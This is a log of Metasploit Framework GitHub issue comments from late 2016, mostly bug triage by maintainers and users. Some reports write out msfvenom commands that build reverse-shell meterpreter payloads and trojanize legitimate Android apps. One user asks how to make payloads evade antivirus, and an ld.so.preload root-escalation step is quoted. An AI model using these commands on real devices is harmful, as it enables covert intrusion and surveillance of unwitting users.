The following issue is shown:

[code]

The

[2016-10-31 15:28] bwatters-r7 commented on #7500
@therealkbhat, that is odd.  Did you leave the earlier code that adjusted column width in `metasploit-framework`?  Also, did you push a branch to your public repo?

[2016-10-31 16:35] therealkbhat commented on #7500
Wow, I feel dumb. You're right, I forgot to revert the changes I made in `metasploit-framework`. >.<

I've opened a [pull request](https://github.com/rapid7/rex-text/pull/5).

[2016-10-31 20:16] mubix commented on #7101
I'm grabbing PCAPs while I wait for the handlers to fail. I have one clean PCAP already (small amount of packets) - I'm waiting for the handler to fail again to do some kind of comparison one what might be causing it

[2016-10-31 20:41] bwatters-r7 commented on #7500
@therealkbhat, I flagged an issue because I forgot quotation marks..... it happens.  Glad it is working.  I'll assign it to me and test/merge.

[2016-11-01 00:41] wvu-r7 commented on #7514
I like this bug, so I'll take a peek. Thanks for the report.

[2016-11-01 00:51] wvu-r7 commented on #7514
Haven't tested it yet, but it probably just needs ```DRb::DRbConnError``` rescued.

[2016-11-01 06:54] nixawk opened #7519 "[-] Payload generation failed: No such file or directory @ rb_sysopen"
[code]

[2016-11-01 11:42] ptresearch opened #7520 "Exception on receiving http request in mswhale_checkforupdates"
## Steps to reproduce

1. use exploit/windows/browser/mswhale_checkforupdates
2. set URIPATH /msf
3. run
4. make a http get request from a remote pc to msf: http://x.x.x.x:8080/msf
5. see unhandled exception on line [98](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/mswhale_checkforupdates.rb#L98):
NoMethodError: undefined method `opts' for #<String:0x

[2016-11-01 13:38] h00die commented on #7293
This was mentioned in #metasploit irc today by @ar1s

[2016-11-01 13:38] h00die commented on #7293
<ar1s> I had the feedback of a sysadmin that after our pentest, a few servers had powershell process running at 100% cpu. Has anyone else got this symptom?
<ar1s> one of the servers being the AD on which I only did a psexec w/ psh target + smart_hashdum

[2016-11-01 13:41] OJ commented on #7101
I've seen this a bit in the field as well. Thanks for the repro script @mubix, I'm still hoping to get to this soon.

[2016-11-01 14:43] h00die commented on #7520
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/mswhale_checkforupdates.rb#L98

[2016-11-01 19:21] OJ commented on #7293
Fix incoming, though I think this was unrelated to @ar1s' issue (I think psexec was the problem there).

[2016-11-01 19:34] OJ commented on #7293
By the way, this is a killer bug report with repro steps @justinsteven. I wish they were all like this.

[2016-11-02 00:10] wvu-r7 commented on #7520
![https://zuts.wordpress.com/tag/there-be-whales-here/](https://zuts.files.wordpress.com/2014/09/scotty-there-be-whales-here.gif)

[2016-11-02 00:14] #7146 closed

[2016-11-02 03:13] mahmoudissam commented on #7458
@timwr , The backwards compatibility is broken again in v4.12.39-dev.

[2016-11-02 16:00] bcook-r7 commented on #7520
I went back a couple of years, and still couldn't find when this exploit last worked. Got to the point where installing ruby 1.8 was required :P.

I hate to sound like a jerk, but perhaps that's grounds for removing the module.

[2016-11-02 16:04] wvu-r7 commented on #7520
I wondered if this bug was related to #2545, but I wasn't able to go back far enough to test. :/

[2016-11-02 17:10] #7519 closed

[2016-11-02 17:12] keviiin38 opened #7524 "Error with msfvenom on Kali Linux"
Hello,

I'm trying to do "**msfvenom -x test.apk -p android/meterpreter/reverse_tcp LHOST=_my.ip_ LPORT=_myport_ -o hack.apk**

And I get this outpout, with the error at the end :
" _No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
**Error: undefined method `[]' for nil:NilClass**_ "

"_uname -a_" output :

[2016-11-02 21:06] OJ opened #7525 "reverse_winhttp/s does not support LURI"
The `reverse_http` payload supports the `LURI` setting correctly, as shown [here](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_http.rb#L53):
[code]
But in `reverse_winhttp`, [we don't](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_winhttp.rb#L40):
[code]
This means the `reverse_winhttp/s` payloads

[2016-11-02 21:28] aconite33 opened #7526 "Generating Powershell Payload"
## Steps to reproduce

How'd you do it?

1. Use msfvenom with the following command:
msfvenom -p windows/meterpreter/reverse_https LHOST=example.com LPORT=443 -f psh

## Expected behavior
Payload Generation

## Current behavior
Error: No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/templates/scripts/to_mem_old.ps1.template

You might also want to check the last ~1k li

[2016-11-02 21:28] wvu-r7 commented on #7448
Wasn't able to obtain the vulnerable software. Sorry.

[2016-11-02 21:42] #7293 closed

[2016-11-02 22:29] aconite33 commented on #7526
Also seems to be having the same problem for psh-reflection

[2016-11-03 07:12] void-in commented on #7526
This issue is a duplicate of https://github.com/rapid7/metasploit-framework/issues/7519 which was patched in https://github.com/rapid7/metasploit-framework/pull/7523. Can you git pull (if you have checkout the repo) and check the psh-reflection and psh format again? If you are using msf through Kali packages, you will have to wait till Friday where the updates are usually pushed.

[2016-11-03 13:09] aconite33 commented on #7526
Ahh okay, I am using it via Kali. I'll check this on Friday and verify.

[2016-11-03 14:22] void-in commented on #7526
I will close this. If you encounter any errors, feel free to re-open. Thanks.

[2016-11-03 14:22] #7526 closed

[2016-11-03 15:52] wchen-r7 opened #7528 "wp_ninja_forms_unauthenticated_file_upload should be moved to multi"
The wp_ninja_forms_unauthenticated_file_upload exploit also works against Wordpress + Ninja Forms plugin on a WAMP setup, therefore the module should be moved to exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.

The following is proof that it works against WAMP:

[code]

[2016-11-03 16:12] wchen-r7 commented on #7524
What happens if you generate it without the ```-x``` flag on Kali?

[2016-11-03 17:36] exploitagency commented on #7524
I can't give any input to this besides it works on Kali's package. the older *.39 vs *.40
I'm assuming you manually updated metasploit(need to use a non root user I think) or are you using bleeding edge repo?
You can always downgrade if you don't find a solution using

rm /etc/apt/sources.list.d/metasploit-framework.list
apt-get update
apt-get remove metasploit-framework
apt-get install metasploit

[2016-11-04 15:31] wvu-r7 commented on #7514
So, I've been getting ```DRb::DRbConnError``` even with the syscall vector. Tested on 2.1.5 with OS X, Ubuntu, and Debian. I think I'll refactor the module to take targets.

[2016-11-04 16:44] wvu-r7 commented on #7514
Wow, this module was clearly written in 2011.

[2016-11-04 17:32] wvu-r7 commented on #7514
So, I've been getting ```DRb::DRbConnError``` even with the syscall vector. Tested with 2.1.5 on Debian and Ubuntu and 2.3.1 on OS X. I think I'll refactor the module to take targets.

[2016-11-04 18:12] keviiin38 commented on #7524
@wchen-r7 when I try without the -x it works

[2016-11-04 18:12] wchen-r7 commented on #7524
ok thanks.

[2016-11-04 18:44] keviiin38 commented on #7524
Edit : @exploitagency I tried your solution too but the problem at the end is still the same...

If it works with other, maybe i've not something necessary to make it work but i don't know what..

[2016-11-05 03:26] nixawk opened #7533 "Post failed: Errno::ENOENT No such file or directory @ rb_sysopen - /path/to/metasploit-framework/data/templates/scripts/to_mem_pshreflection.ps1.template"
[code]

[code]

[code]

[2016-11-05 04:34] busterb commented on #7533
pinging @dmaloney-r7 - looks like these call sites need to be swapped to Msf::Util::EXE.to_win32pe_psh as well, no?

[2016-11-05 06:28] wvu-r7 commented on #7486
Closing because it's a known idiosyncrasy in ```CmdStager```. I'll fix the module(s) soon, though. Thanks for the report!

[2016-11-05 06:28] #7486 closed

[2016-11-05 06:29] wvu-r7 commented on #7520
#2545 is almost certainly the cause of this. Looks like some of these modules were never updated.

[2016-11-05 22:24] exploitagency commented on #7524
I also always install these packages for other projects, but the error you have looks like a real coding error.... what have you manually installed or updated?  Kali breaks easily when you don't use their repo's.

sudo apt-get install build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev ncurses-dev perl pkg-config

[2016-11-06 04:13] Franklucus opened #7534 "payload(custom) > /root/Downloads/putty.exe [*] exec: /root/Downloads/putty.exe"
I am trying to use my own custom payload by embeeding a putty.exe inside the exploit.   I am using Metasploit inside Kali Linux.  What am I doing wrong?

info exploit/windows/fileformat/ms12_027_mscomctl_bof

       Name: MS12-027 MSCOMCTL ActiveX Buffer Overflow
     Module: exploit/windows/fileformat/ms12_027_mscomctl_bof
   Platform: Windows
 Privileged: No
    License: Metasploit Framework Lic

[2016-11-06 05:33] xl7dev opened #7535 "gitlab_user_enum RuntimeError"
[code]

[2016-11-06 07:18] wvu-r7 commented on #7534
Well, first of all, it's ```PAYLOADFILE```, not ```PAYLOAD FILE```. Second, it's a BOF that takes shellcode, not an executable. Third, you might want to look at ```EXE::Custom``` for custom executables.

[2016-11-06 07:18] void-in commented on #7534
The datastore option is PAYLOADFILE not PAYLOAD FILE as you have specified. Further, you can't use an exe file as a payload in an exploit.. I am going to close this issue. Please use https://community.rapid7.com for support queries. Thanks.

[2016-11-06 07:19] void-in commented on #7534
Ah. 3 seconds too late @wvu-r7  :)

[2016-11-06 07:19] #7534 closed

[2016-11-06 07:19] wvu-r7 commented on #7534
@void-in: Great minds think alike! Something like that. :P

[2016-11-06 07:22] wvu-r7 commented on #7535
You sure it's GitLab?

[2016-11-06 07:23] wvu-r7 commented on #7534
@Franklucus: Hope this helps. Feel free to drop by #metasploit on freenode if you have further questions. Thanks.

[2016-11-06 07:26] wvu-r7 commented on #7535
Maybe your ```TARGETURI``` is wrong?

[2016-11-06 14:56] h00die commented on #7535
edited ticket to wrap in code execution so it looks correct

[2016-11-06 15:17] keviiin38 commented on #7524
@exploitagency here for you, thanks in advance

► If I remember well, the JDK is the last from java. APKTool from their website. I'd install the msf from website and removed it with early coment. Else i didn't see what I've installed out of repo's..

► I tried with all last apk from Facebook, whatsapp, Chrome and Google Messenger (All downloaded from apkmirror) every time same problem

► Done but

[2016-11-06 16:38] exploitagency commented on #7524
I didn't think those packages were it but I just remembered, I have run the "gem update" command.
I haven't manually installed APKTool or the JDK.
I know I'm not much help, just a Kali user who the command works for.  I'll test in a fresh virtual machine eventually if I ever get a chance.  Don't want to mess with my base OS too much.

[2016-11-06 17:09] keviiin38 commented on #7524
I've run it too, i saw an error about sqlite3

I'd install the JDK for android studio and apktool because i'd problems by trying to rebuild apps by hand

Thanks, i'll try too on a VM and if it works there i'll must reinstall a fresh kali...

[2016-11-06 18:43] KINGSABRI opened #7538 "Reducing modules number"
Hey @all

One of the noticeable things in metasploit that there are tons of modules for many things of the same kind of goal. This may keep things clear, but makes metasploit heavier to load and bigger site. If we can find all modules -especially auxiliary - modules that can be merged and use `Action` command to change its functionality, it would be more practical.

## Expected behavior

[code]

A

[2016-11-06 18:43] exploitagency commented on #7524
:-)

[2016-11-07 03:19] nixawk commented on #7535
@xl7dev everything works good. I guess that your target is not a gitlab site.

[code]

[2016-11-07 04:57] 404Ghost99 opened #7539 "WARNING! The following modules could not be loaded! (phoenix_command.rb)"
i'm pulling metasploit from github # git pull and i'm running msfupdate command, than i'm running metasploit console but i've got this error like in the screenshot...

please fixed the script **phoenix_command.rb:218** thanks :)

![screenshot from 2016-11-07 11-23-14](https://cloud.githubusercontent.com/assets/8980647/20046844/ec579248-a4e0-11e6-8f79-19895f0b2ef6.png)

[2016-11-07 06:09] wvu-r7 commented on #7535
Closing this, since it's not a bug. Feel free to reach out in the usual support channels.

[2016-11-07 06:09] #7535 closed

[2016-11-07 06:11] wvu-r7 commented on #7539
Crap. They forgot a ```?```. Missed this in review. Thanks for the catch!

[2016-11-07 06:13] wvu-r7 commented on #7539
Broken in #7537. Fixed in https://github.com/rapid7/metasploit-framework/commit/4eb42a91715a737bc7a6e73bd0611edd8ee5efed.

[2016-11-07 06:13] #7539 closed

[2016-11-07 06:18] 404Ghost99 commented on #7539
:dancing_men:

[2016-11-07 07:41] wvu-r7 commented on #7520
Looks like that PR changed the behavior of ```js_heap_spray```  to return a string passed through ```ObfuscateJS#obfuscate``` instead of the ```ObfuscateJS``` instance itself.

[2016-11-07 07:43] wvu-r7 commented on #7520
Looks like that PR changed the behavior of ```js_heap_spray```  to return a string passed through ```ObfuscateJS#obfuscate``` instead of the ```ObfuscateJS``` instance itself, which has the ```opts``` accessor.

[2016-11-07 07:45] wvu-r7 commented on #7520
Looks like that PR changed the behavior of ```js_heap_spray```  to return ```ObfuscateJS#obfuscate``` (an obfuscated JS string) instead of the ```ObfuscateJS``` instance itself, which has the ```opts``` accessor.

[2016-11-07 07:47] wvu-r7 commented on #7520
Seems like something @wchen-r7 would know about or be able to fix. I'm going to back off this, since I have too many tickets still.

[2016-11-07 09:21] NickDelBen opened #7541 "SSH Session Fails Due to Identity file Keysize"
When attempting to use `ssh_login_pubkey` to create a new shell session with a host I receive an error regarding the size of the ssh identity key file used.

Here is a more detailed description of the issue:

[code]

## Steps to reproduce

1. Set up any linux target machine (I used Ubuntu 16.04)
2. Generate a key file that is 4096b long to use
[code]
3. Ensure the newly generated key is in the tar

[2016-11-07 09:26] wvu-r7 commented on #7541
Thanks for filing this!

[2016-11-08 00:49] h00die commented on #7538
Not sure if this would have an effect on msf Pro and therefore need to be coordinated/handled on that side of the house.  Maybe someone with r7 could chime in.
@wvu-r7 is on a **WELL** deserved vacation, so hopefully someone else.

[2016-11-08 01:42] wvu-r7 commented on #7538
Would almost certainly have an effect on Pro, specifically how Pro runs modules as part of its automated scans/attacks.

It would also require massive module deprecations on the Framework side, having a significant effect on what modules users have been running.

That said, I'm all for using actions in aux modules and targets in exploits, as we discussed on IRC for #7017. :)

[2016-11-08 01:44] wvu-r7 commented on #7538
(I'm assuming this stemmed from #7017, where I suggested using actions for your module. This seems like the logical conclusion to that discussion...)

[2016-11-08 01:48] h00die commented on #7538
Maybe a staged approach with the more popular modules (TCP scan) last. That way theres the most impact and the least amount of possible issues

[2016-11-08 01:53] wvu-r7 commented on #7538
Arguably, some modules shouldn't be combined, too. If different vulns are being exploited, they should be in different modules.

[2016-11-08 01:54] wvu-r7 commented on #7538
I also feel you'd hit a point of diminishing returns pretty fast, too, since there will ALWAYS be new modules.

[2016-11-08 01:59] wvu-r7 commented on #7538
And modules that are too large are a PITA to maintain, too. Lots of cons, lots of pros. It wouldn't be the first time it's come up.

[2016-11-08 05:14] wchen-r7 commented on #7520
Ok, I will take a look :-) Thanks!

[2016-11-08 05:55] void-in commented on #7538
@wvu-r7 Also the fact that a lot of automation scripts need to be updated as well (I certainly use a lot of smb aux stuff scripts for enum). Not that I am disagreeing with @KINGSABRI . Some modules are definitely worth combining for.

[2016-11-08 06:00] wvu-r7 commented on #7520
Thank you, @wchen-r7!

[2016-11-08 07:46] KINGSABRI commented on #7538
@wvu-r7 That's right, one of the main idea triggers is our discussion at #7017 another old one was

[code]

The fact that there are always new modules is not conflicting with the main goal, if there is an existing module that can have the new idea then it can be merged, otherwise create a new/separate module.

Till now, I can see that there are some concerns could be summaries into:

1. Metasploit

[2016-11-08 09:14] nixawk opened #7544 "[request] MySQL / MariaDB / Percona - Root Privilege Escalation"
http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html

by a privilege escalation vulnerability which can let attackers who have
gained access to mysql system user to further escalate their privileges
to root user allowing them to fully comprom

[2016-11-08 11:37] nixawk commented on #7544
In the default, mysql user does have enough privilege to finish`echo $PRIVESCLIB > /etc/ld.so.preload`.

[code]

[2016-11-08 12:57] FireFart commented on #6605
I think this can be closed since .ruby-version already wants version 2.3.1

[2016-11-08 12:57] #6605 closed

[2016-11-08 16:47] arisada opened #7545 "PSExec with powershell results in 100% cpu usage"
## Steps to reproduce

We discovered this the hard way after our pentest team performed an internal intrusion test and our customer had to reboot a few servers due to excessive CPU usage.

I have a reduced test case with an up to date metasploit and windows 2008r2 x64. This is a screenshot of what's happening:
[Screenshot](http://i.imgur.com/7YP3IKE.png)
### How'd you do it?

[code]

From this poi

[2016-11-08 17:25] void-in commented on #7545
This is actually a dup of https://github.com/rapid7/metasploit-framework/issues/7293 which was fixed in https://github.com/rapid7/metasploit-framework/pull/7522. I believe the omnibus installer should have the changes merged ( @bcook-r7 ?).

[2016-11-08 17:29] arisada commented on #7545
I just checked and the fix for #7293 is merged in the tree I used for the screenshot. I'm also the ar1s OJ mentions in the bug report.

[2016-11-08 17:59] void-in commented on #7545
Thanks for checking. Will close this issue now.

[2016-11-08 18:07] arisada commented on #7545
Please reopen it. What I meant is that the bug is not a dup of #7293 and the fix for that bug didn't help in my case. Thanks

[2016-11-08 18:57] void-in commented on #7545
Ah. I thought that should've fixed this. Sorry for the misunderstanding. Re-opening.

[2016-11-08 19:00] arisada commented on #7545
I'm sorry, my explanation wasn't very clear now that I'm reading it again.

[2016-11-08 19:09] wvu-r7 commented on #4886
Fixed in https://github.com/rapid7/metasploit-credential/pull/124.

[2016-11-08 19:09] #4886 closed

[2016-11-08 19:09] wvu-r7 commented on #7541
Fixed in https://github.com/rapid7/metasploit-credential/pull/124.

[2016-11-08 19:09] #7541 closed

[2016-11-09 01:45] h00die commented on #7544
which OS did you test that on? I'd assume its universally true, but just want to have it noted.

[2016-11-09 02:24] xl7dev commented on #7535
@wvu-r7 @h00die  I'm sorry,This issue was fixed in GitLab v7.5.0 and is present from
  GitLab v5.0.0,

[2016-11-09 02:50] nixawk commented on #7544
[code]

[2016-11-09 04:27] wvu-r7 commented on #7535
@xl7dev: Okay.

[2016-11-09 13:14] keviiin38 commented on #7524
Hello back guys,

I've installed back a fresh Kali Linux on my computer, everything is okay but when i launch the msfvenom command again, i get the same error...
I have just installed zipalign with apt-get nothing else
On the live that i've tried before, everything worked great... but i'd not to install zipalign

How can a live better work, or contain more things than a hard install ?

Thanks

[2016-11-09 15:38] exploitagency commented on #7524
sudo apt-get install kali-linux-full

[2016-11-09 21:07] wchen-r7 commented on #7520
I have submitted a fix here:
https://github.com/rapid7/rex-exploitation/pull/2

[2016-11-10 02:04] nixawk commented on #7544
Close it.

[2016-11-10 02:04] #7544 closed

[2016-11-10 02:39] #7520 closed

[2016-11-10 16:52] pbarry-r7 commented on #7471
My apologies, I've been meaning to get back to this.  I've tried to generate an exported XML Acunetix file to test the import with, but their trial version of the software doesn't support the XML export capability.  I've located an older exported XML file we have here, but it doesn't appear to be applicable in this situation.  Do you have a file you could share?  If so, we could securely hand it o

[2016-11-10 19:53] bcook-r7 commented on #7101
Any lead on the pcap-of-death @mubix ?

[2016-11-10 21:33] keviiin38 commented on #7524
@exploitagency I sent you the files of all outputs on your email address

I tried again on a Kali Live non updated, I got this working :

**On the live :**

- *ruby -v* → *ruby 2.3.1p112 (2016-04-26) [x86_64-linux-gnu]*

- *apktool -v* → *Apktool v2.2.0-dirty [...]*

- *uname -a* → *Linux kali 4.6.0-kali1-amd64 [...] SMP Debian 4.6.4-1kali1 (2016-07-21)*

- *java -version* → *openjdk version "1.8.

[2016-11-11 00:03] cacaocaca opened #7550 "bash: ./msfvenom: File o directory non esistente"
## Steps to reproduce

How'd you do it?

root@kali:~/Scrivania# ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \

bash: ./msfvenom: File o directory non esistente
bash: ./msfvenom: File o directory non esistente
bash: ./msfvenom: File o directory non esistente

This section should also tell us any relevant information about the
enviro

[2016-11-11 00:14] exploitagency commented on #7524
Its a long shot but I noticed maybe your locale is different.

My output of:
locale

LANGUAGE=
LC_CTYPE="en_US.UTF-8"
LC_NUMERIC="en_US.UTF-8"
LC_TIME="en_US.UTF-8"
LC_COLLATE="en_US.UTF-8"
LC_MONETARY="en_US.UTF-8"
LC_MESSAGES="en_US.UTF-8"
LC_PAPER="en_US.UTF-8"
LC_NAME="en_US.UTF-8"
LC_ADDRESS="en_US.UTF-8"
LC_TELEPHONE="en_US.UTF-8"
LC_MEASUREMENT="en_US.UTF-8"
LC_IDENTIFICATION="en_US.UTF-8"

[2016-11-11 00:32] cacaocaca commented on #7550
Maybe i wrong becouse i text  ./msfvenom and i need to text msfvenom but now combine payload don t work anymore for bypass you need just use so the right encoders with the right interaction for be  FUD if is already fud and you paste another encoders is alreadt detected

[2016-11-11 01:43] exploitagency commented on #7524
Try
apt-get cpp-5 gcc-5
and all those libs I have vs you.

Output of
sdiff f.txt me.txt -s>compare.txt

comerr-dev/kali-rolling,now 2.1-1.43.3-1 amd64		      <

efibootmgr/kali-rolling,now 14-1 amd64			      <

gcc-4.9-base/now 4.9.3-14 amd64 [installed, local]	      |	gcc-4.9-base/now 4.9.3-14 amd64 [installed,local]

grub-efi-amd64/kali-rolling,now 2.02~beta3-1 amd64	      |	grub-pc/kali-rolling

[2016-11-11 05:50] VanishingTacos opened #7552 "Payload Injected APK Crashes On Start"
I ran msfvenom -x /root/Downloads/ES.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -o /root/Downloads/hack.apk and everything seems to have worked perfectly. I am able to install the new infected APK but it crashes as soon as I try to start up the app. I get the error Unfortunately, ES File Explorer has stopped. This even happens to me when I try to manually inject the paylo

[2016-11-11 06:28] dana-at-cp commented on #7524
@keviiin38 On your Kali system can you run the following on any APK file and share the output?

[code]

[2016-11-11 06:40] z4cco commented on #7552
I think you may have to decompile both original ES apk and payload then copy payload into original ES apk. You could do this through apktool

[2016-11-11 07:31] VanishingTacos commented on #7552
msfvenom does everything from decompiling original apk and payload apk and
compiling the two together. That works for its just I can't run the apk
with it crashing.

On Nov 11, 2016 1:40 AM, "z4cco" <notifications@github.com> wrote:

[2016-11-11 08:13] keviiin38 commented on #7524
@dana-at-cp The output of the command (i.e for WhatsApp)

Signature :
Propriétaire : CN=Brian Acton, OU=Engineering, O=WhatsApp Inc., L=Santa Clara, ST=California, C=US
Emetteur : CN=Brian Acton, OU=Engineering, O=WhatsApp Inc., L=Santa Clara, ST=California, C=US
Numéro de série : 4c2536a4
Valide du : Sat Jun 26 01:07:16 CEST 2010 au : Tue Feb 16 00:07:16 CET 2044
Empreintes du certificat :
	 MD5:

[2016-11-11 09:23] z4cco commented on #7552
I also tried to inject this meterpreter reverse_tcp payload into a google chrome apk and I had the same issue with an android 7.0... May someone help to fix this?

[2016-11-11 10:05] keviiin38 commented on #7524
EDIT :

# **I GOT IT WORKING !**

Working great on my new install !

- en_US.UTF-8 Locale

- French (Legacy, Alternative) for the keyboard

- Luks LVM install in normal mode (no UEFI)

- Everything up to date !

**Working perfectly !**

_**Conclusion :** for French people (and maybe other) use the en_US.UTF-8 Locale !_

Thanks a lot to you guys !

**And particularly to you @exploitagency for your

[2016-11-11 10:09] keviiin38 commented on #7552
Wich version of the app are you trying to install ?

Did the original .apk before injection work ?

Where did you get the .apk file ?

[2016-11-11 10:16] z4cco commented on #7552
For my part  I tried to inject Chrome Browser 54.0.2840.85 apk from apkmirror.com
It worked fine before injection

[2016-11-11 10:24] keviiin38 commented on #7552
I've tried with ES before : Working and after injection : Crash

I'll try with chrome and edit this with result

[2016-11-11 12:35] exploitagency commented on #7524
:-)
Good deal!

[2016-11-11 13:36] dana-at-cp commented on #7524
@keviiin38 Thanks for sharing the keytool output. Can you reopen this issue? It is still a bug that needs to be tracked and fixed.

Rapid7 folks, the problem is with this function in lib/msf/core/payload/apk.rb:

[code]

The function breaks when keytool is used on a system with non-English locale.

I introduced this issue in #7451 and will start working on a fix.

[2016-11-11 14:20] bcook-r7 commented on #7524
Awesome, thanks for the great debugging effort @dana-at-cp. Sounds like normalizing the locale in run_cmd would be the best approach.

[2016-11-11 14:24] bcook-r7 commented on #7550
This is not a bug in metasploit, this is how Linux works. You're using './' in your command prompt but in Kali linux it is in your PATH. Just use 'msfvenom' without the './'

Here is some basic information for you: http://superuser.com/questions/238987/how-does-unix-search-for-executable-files . Please note that this github project is not the appropriate place for Linux help.

[2016-11-11 14:24] #7550 closed

[2016-11-11 14:26] dana-at-cp commented on #7524
@bcook-r7 I'm going to try this:

[code]

Supposedly, this is the supported way to force the JDK tools to use a specific language for a single use.

Pull request inbound.

[2016-11-11 15:57] dmaloney-r7 commented on #7533
@busterb I had searched the tree previously, but i don't think I had looked in the modules directory. this module seems to be replicating huge chunks of library code inside the module...

[2016-11-11 16:14] busterb commented on #7533
yeah, I concur (couldn't find any more)

[2016-11-11 16:42] dmaloney-r7 commented on #7538
Some of these seem like good ideas, the portscan ones for example make lots of sense, but the SMB ones don't as a counter example. Those modules are doing rather dramatically different things. There are definitely some places where some of these could be combined but we should be very careful how we do it. Modules should be performing discrete actions, and not big multi-tools in of themselves. Som

[2016-11-11 16:50] itsbriany opened #7555 "Msf::DBManager tests failing"
Hi MSF community!

So far, I have successfully set up my dev environment and MSF is working great!

However, I have ran into an issue where all of the `Msf::DBManager` tests fail. This probably means that I have not properly set up postgres for the test environment (all the other tests pass).

## Steps to reproduce

After following the [documentation](https://github.com/rapid7/metasploit-framework

[2016-11-11 18:41] VanishingTacos commented on #7552
ES File Explorer 4.1.4.3 before injection works and opens just like normal. I downloaded the APK from [here}(http://es-file-explorer.en.uptodown.com/android/download).

ES File Explorer 4.1.4.3 after injection using mfsvenom installs just like normal with the added permissions but crashes on start up. [Here](http://pastebin.com/8J62T3R1) is the output I get after starting the injection.

I will at

[2016-11-11 18:51] exploitagency commented on #7524
I found another bug kind of related to this.
Template file name can not contain certain characters such as parenthesis.

msfvenom -x "template(1).apk" -p android/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=4444 -o hack.apk

No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
Error: undefined method `[]'

[2016-11-11 18:55] #7524 closed

[2016-11-11 19:14] VanishingTacos commented on #7552
ES File Explorer 4.1.4.3 after manually injecting the APK installs just like normal with the added permissions but crashes on start up. [Here](http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/) are the instructions I followed.

[2016-11-11 20:37] cacaocaca commented on #7550
Yes i have look thanks ..What do you raccomanded for bypass av with msfvenom and create payload fud ? I already know how create payload fud with shikata_ga_nai with much interaction and use the option -x but i would like know other method becouse i know much people scan on virustotal so maybe this method on some month no is more fud for it i want learn another method for bypass av .. I try now wit

[2016-11-11 20:58] pbarry-r7 commented on #7533
Fixed via [PR 7554](https://github.com/rapid7/metasploit-framework/pull/7554).

[2016-11-11 20:58] #7533 closed

[2016-11-12 02:12] itsbriany commented on #7555
So I figured out how to fix this and why the tests were failing:

When `msf_test_db` is first created, it has no tables. It appears that `msfconsole` automatically generates the tables for the dev environment (commonly referred to as database migrations) on startup (this is why most tests previously passed when temporarily pointing the dev environment to `msf_test_db` in `$HOME/.msf4/database.yml`

[2016-11-12 10:32] KINGSABRI commented on #7538
@dmaloney-r7 Thanks for commenting, I totally agree with you, so let's put some criteria for those modules that can be merged, like

- Deprecated modules, that have exist better replacement
- Modules that have similar/mergable actions for the same target/system/service/application
- [ADD CRITERIA HERE]

[2016-11-12 15:21] 0x4148 commented on #7370
Full writeup can be found up here
https://0x4148.com/2016/10/25/freepbx-remote-root-exploit-writeup/
You are using updated version
basename($foo['filename']); Fixed the problem

[2016-11-12 15:26] nixawk commented on #7370
Thanks @0x4148. Could you share your vuln-lab environment ? I want to try it again.

[2016-11-12 15:29] 0x4148 commented on #7370
[hotelwakeup.zip](https://github.com/rapid7/metasploit-framework/files/587292/hotelwakeup.zip)
Pre-patched

[2016-11-12 18:30] itsbriany commented on #7552
I'm currently looking into this issue. I reproduced the steps above, and also got the same result (a crash on load). Here is the android crash log:

[code]

[2016-11-12 18:36] VanishingTacos commented on #7552
I have came to the conclusion that it is caused by some security feature built into Android. My phone manufacturer just pushed an update that caused the stand alone payload to stop working(as the stand alone payload worked fine before). I put the same payload on a older tablet and it works perfectly fine. Newer versions of Android patched this exploit.

[2016-11-12 18:42] itsbriany commented on #7552
What Android version were you running on your older tablet? I ran the exploit on Android 7.0 on an emulator. Based off the error I got, it looks like some Java classes/dependencies got clobbered after injecting the meterpreter payload into the APK.

[2016-11-12 18:45] VanishingTacos commented on #7552
My tablet is running Android 4.4.2.

[2016-11-12 18:45] VanishingTacos commented on #7552
My tablet is running Android 4.4.2.

[2016-11-12 18:58] z4cco commented on #7552
I tried to run my chrome browser infected apk on a 4.4.2 device (phone) and it didn't work yet..

[2016-11-12 19:00] VanishingTacos commented on #7552
How did you inject it @z4cco

[2016-11-12 19:03] z4cco commented on #7552
I injected it using msfvenom. However, my standalone payload apk works fine on both devices

[2016-11-12 19:10] itsbriany commented on #7552
So I just tried running the same thing on Android 4.4 and got the same Java error. I will look into how MSF injects the payload into the APK and see if anything important is being overridden.

[2016-11-13 00:01] wvu-r7 commented on #7520
Thanks again, @wchen-r7. :)

[2016-11-13 02:51] h00die opened #7558 "edb modules missing in msf"
This will be a list of modules in EDB which are not in MSF.
I can attempt to PR them and be in charge of this if no one from r7 (cough cough, intern) wants to handle it.  I went back until 2014-12-16, doing a search for '(metasploit)' with the author NOT metasploit.

## to do
- [Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)](https://www.exploit-db.com/exploits/40740/)

[2016-11-13 20:47] cacaocaca opened #7560 "Msfvenom Can binder exe and execute 2 File"
## Steps to reproduce

How'd you do it?

Hi i always use msfvenom with meterpreter payload and with some encoders for finder i use easybinder so i ask with msfvenom i can binder for example inside winrar.exe the payload and while execute winrar open ? I try to use option -x and -k i have meterpreter session but winrar don t want open .

This section should also tell us any relevant information abo

[2016-11-14 14:10] dana-at-cp commented on #7552
@VanishingTacos Have you tried ES file explorer 4.1.4.3 from the Google Play store? If you are not dealing with legitimate, known good, APK files then you can expect mixed results.

[2016-11-15 13:16] #7500 closed

[2016-11-15 16:02] timwr commented on #7524
Many thanks guys for debugging and fixing this!

@exploitagency I can't actually reproduce the issue with parenthesis.
[code]

[2016-11-15 18:38] cacaocaca commented on #7560
